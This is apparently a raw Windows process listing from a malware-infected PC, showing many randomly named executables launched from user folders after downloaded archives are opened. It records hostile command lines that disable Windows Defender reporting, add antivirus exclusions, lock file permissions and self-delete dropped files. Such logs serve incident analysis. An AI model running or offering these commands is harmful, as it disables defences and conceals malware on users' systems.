--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8551149755 --mojo-
platform-channel-handle=10688 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 8816, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 14564, Name: WinRAR.exe, CommandLine: "C:\Program Files\WinRAR\WinRAR.exe" "C:\
Users\CONSULT SOIL TESTING\Downloads\File.7z"
===============
ID: 5936, Name: SearchProtocolHost.exe, CommandLine: "C:\Windows\system32\
SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3280135814-
1481727056-1528295059-10025_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-
3280135814-1481727056-1528295059-10025 1 -2147483646 "Software\Microsoft\Windows
Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\
ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
===============
ID: 13168, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8631367743 --mojo-
platform-channel-handle=5280 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 6648, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8631397662 --mojo-
platform-channel-handle=8836 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 2388, Name: OausKRQhaYx5IYt1vYpCc80n.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\OausKRQhaYx5IYt1vYpCc80n.exe"
===============
ID: 5728, Name: fyYM3BnrLqnui_QcizmcS8NP.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\fyYM3BnrLqnui_QcizmcS8NP.exe"
===============
ID: 14772, Name: AddInProcess32.exe, CommandLine: "C:\Windows\Microsoft.NET\
Framework64\v4.0.30319\AddInProcess32.exe"
===============
ID: 8048, Name: jYmgPA, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\ufTVJGQKRJAvHedhVT\jYmgPA"
===============
ID: 14576, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8644289876 --mojo-
platform-channel-handle=8976 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 15628, Name: NMN2nF0rpT.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\uWQ4axEW\NMN2nF0rpT.exe"
===============
ID: 8828, Name: FQHLmn, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" - --silent --allusers=0
===============
ID: 11168, Name: FQHLmn, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" --type=crashpad-handler /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\
Users\CONSULT SOIL TESTING\AppData\Roaming\Opera Software\Opera Stable\
crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --
annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --
annotation=ver=97.0.4719.83 --initial-client-
data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x5ba933e0,0x5ba933f0,0x5ba933fc
===============
ID: 9812, Name: FQHLmn, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" --backend --install --import-browser-data=0 --
enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0
--general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1
--installfolder="C:\Users\CONSULT SOIL TESTING\AppData\Local\Programs\Opera" --
profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --
setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --
server-tracking-data=server_tracking_data --initial-pid=8828 --package-dir-
prefix="C:\Users\CONSUL~1\AppData\Local\Temp\.opera\Opera Installer Temp\
opera_package_20230419223645" --session-guid=aca3b1d4-bcea-4c77-b04c-cf725f6a5969
--server-tracking-
blob="NDdlNzhmMDkzYmYwZWNlMzAwMjEwYjRkNTZkYzAyOGFiZTU2NGUxOWZhOTlmYzY4YjBkMTFlMzZkN
WUxZjViNzp7ImNvdW50cnkiOiJBRSIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9k
dWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/
dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF
0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIi
wicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY4MTkyOTQxNS42MzY5IiwidXNlcmFnZW50IjoiT
W96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDEwLjA7IFdPVzY0OyBUcmlk
ZW50LzcuMDsgLk5FVDQuMEM7IC5ORVQ0LjBFOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuMC4
zMDcyOTsgLk5FVCBDTFIgMy41LjMwNzI5KSIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2NyIsIm1lZGl1bSI6Im
FwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMWJiMmYyNWUtODIzNy00NGIxLTliYTItOGViNDMwMTQ0N
TM0In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-
handle=C804000000000000
===============
ID: 6824, Name: FQHLmn, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" --type=crashpad-handler /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\
Users\CONSULT SOIL TESTING\AppData\Roaming\Opera Software\Opera Stable\
crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --
annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --
annotation=ver=97.0.4719.83 --initial-client-
data=0x304,0x308,0x30c,0x2d4,0x310,0x5b1333e0,0x5b1333f0,0x5b1333fc
===============
ID: 10744, Name: OzCnVS, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\oLSFaWFOelWfunHyRx\OzCnVS"
===============
ID: 37680, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 59752, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "385104"
===============
ID: 65472, Name: svcservice.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\telemetry\svcservice.exe"
===============
ID: 91784, Name: vyoLvZ, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\wDfsOUkfCgHGTAKNAN\vyoLvZ" - /S
===============
ID: 16544, Name: lw10pD7.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\
Roaming\PdwOD8\lw10pD7.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 16936, Name: WinRAR.exe, CommandLine: "C:\Program Files\WinRAR\WinRAR.exe" "C:\
Users\CONSULT SOIL TESTING\Downloads\Install.7z"
===============
ID: 17920, Name: build2.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\
Local\ddf544b1-449c-4bdd-a583-fd1c0fa1c089\build2.exe"
===============
ID: 17944, Name: Install.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
Rar$EXb16936.42266\Install.exe"
===============
ID: 18484, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 20960, Name: svcservice.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\telemetry\svcservice.exe"
===============
ID: 105700, Name: hy6Hoelk1x_kEPvwubpgEET4.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\hy6Hoelk1x_kEPvwubpgEET4.exe"
===============
ID: 109104, Name: is-K5PRT.tmp, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
is-9TM11.tmp\is-K5PRT.tmp" /SL4 $50748 "C:\Users\CONSULT SOIL TESTING\Pictures\
Minor Policy\hy6Hoelk1x_kEPvwubpgEET4.exe" 2562561 56320
===============
ID: 14604, Name: UrmCt2gO0F7gGiBxtJEafvRR.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\UrmCt2gO0F7gGiBxtJEafvRR.exe"
===============
ID: 38636, Name: ijV6rJsB_BHz7r7pG16cQZzx.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\ijV6rJsB_BHz7r7pG16cQZzx.exe"
===============
ID: 38604, Name: GCJ7jIcwcnLDCpvNjpTYtJTH.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\GCJ7jIcwcnLDCpvNjpTYtJTH.exe"
===============
ID: 17724, Name: CHc2AuPyjWHfq9s2dMrP8HKh.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\CHc2AuPyjWHfq9s2dMrP8HKh.exe"
===============
ID: 12632, Name: Tg5MlmqsgMCHfF0xYHFR6e2V.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\Tg5MlmqsgMCHfF0xYHFR6e2V.exe"
===============
ID: 18204, Name: 97Fovac4wG3gxa3BsmHaNpZG.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\97Fovac4wG3gxa3BsmHaNpZG.exe"
===============
ID: 18676, Name: xjQinxGtGBGWCTQOIcI2SHL3.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\xjQinxGtGBGWCTQOIcI2SHL3.exe"
===============
ID: 18668, Name: 12x8yBTiIfFBAUMP8XL9FR00.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\12x8yBTiIfFBAUMP8XL9FR00.exe"
===============
ID: 18644, Name: AwCvEyv9Wp2vaRK1acEEpgsg.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\AwCvEyv9Wp2vaRK1acEEpgsg.exe"
===============
ID: 18712, Name: Rec419.exe, CommandLine: "C:\Program Files (x86)\FKDsoftFR\Rec419\
Rec419.exe"
===============
ID: 18728, Name: 6MpsqEM6tHxdRKveVmU4DXSZ.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\6MpsqEM6tHxdRKveVmU4DXSZ.exe"
===============
ID: 18832, Name: cmd.exe, CommandLine: cmd.exe /d /c bwsjhihxsxf.bat 3956101466505
===============
ID: 18864, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 18872, Name: is-E3SOI.tmp, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
is-NQ34P.tmp\is-E3SOI.tmp" /SL4 $207B2 "C:\Users\CONSULT SOIL TESTING\Pictures\
Minor Policy\6MpsqEM6tHxdRKveVmU4DXSZ.exe" 2562561 56320
===============
ID: 18884, Name: Zhcf2b7KCQFYNg6CsB_NaYQZ.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\Zhcf2b7KCQFYNg6CsB_NaYQZ.exe"
===============
ID: 18912, Name: Y9J1AhEb4sEX34ee_jM060cY.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\Y9J1AhEb4sEX34ee_jM060cY.exe"
===============
ID: 18936, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 19064, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 19136, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 19148, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 19320, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 19412, Name: oneetx.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 19420, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 19448, Name: ge486920.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP001.TMP\ge486920.exe
===============
ID: 19524, Name: cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /k echo Y|
CACLS "oneetx.exe" /P "CONSULT SOIL TESTING:N"&&CACLS "oneetx.exe" /P "CONSULT SOIL
TESTING:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "CONSULT SOIL TESTING:N"&&CACLS "..\
cb7ae701b3" /P "CONSULT SOIL TESTING:R" /E&&Exit
===============
ID: 19532, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 19540, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 19960, Name: ge486920.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP001.TMP\ge486920.exe
===============
ID: 19984, Name: WerFault.exe, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p
19448 -s 580
===============
ID: 20076, Name: conhost.exe, CommandLine: conhost.exe lyjxmdxahyk.dat
3956101466505
===============
ID: 20132, Name: forfiles.exe, CommandLine: "C:\Windows\System32\forfiles.exe" /p
c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f
/v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
===============
ID: 20148, Name: foto0165.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
1000001051\foto0165.exe"
===============
ID: 20156, Name: forfiles.exe, CommandLine: "C:\Windows\System32\forfiles.exe" /p
c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\
Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
===============
ID: 20232, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 20328, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 20364, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929472286
===============
ID: 20392, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20444, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20452, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20460, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20568, Name: un969304.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP002.TMP\un969304.exe
===============
ID: 20580, Name: forfiles.exe, CommandLine: "C:\Windows\System32\forfiles.exe" /p
c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f
/v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
===============
ID: 20620, Name: un463571.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP003.TMP\un463571.exe
===============
ID: 20700, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20748, Name: pr721824.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP006.TMP\pr721824.exe
===============
ID: 20824, Name: cmd.exe, CommandLine: /C REG ADD "HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0
/reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v
"SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
===============
ID: 20840, Name: cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t
6 & del /f /q "C:\Users\CONSULT SOIL TESTING\Pictures\Minor Policy\
ayi6H9CyWLbMfxxhMvRVWcx9.exe" & exit
===============
ID: 20876, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20916, Name: cmd.exe, CommandLine: /C REG ADD "HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0
/reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\
Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
===============
ID: 20988, Name: cmd.exe, CommandLine: /C REG ADD "HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0
/reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v
"SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
===============
ID: 21000, Name: fotocr20.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
1000002051\fotocr20.exe"
===============
ID: 21036, Name: reg.exe, CommandLine: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\
Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
===============
ID: 21088, Name: zirH4300.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP007.TMP\zirH4300.exe
===============
ID: 21144, Name: ziKf7847.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP008.TMP\ziKf7847.exe
===============
ID: 21160, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929475484
===============
ID: 21188, Name: it726891.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP009.TMP\it726891.exe

You might also like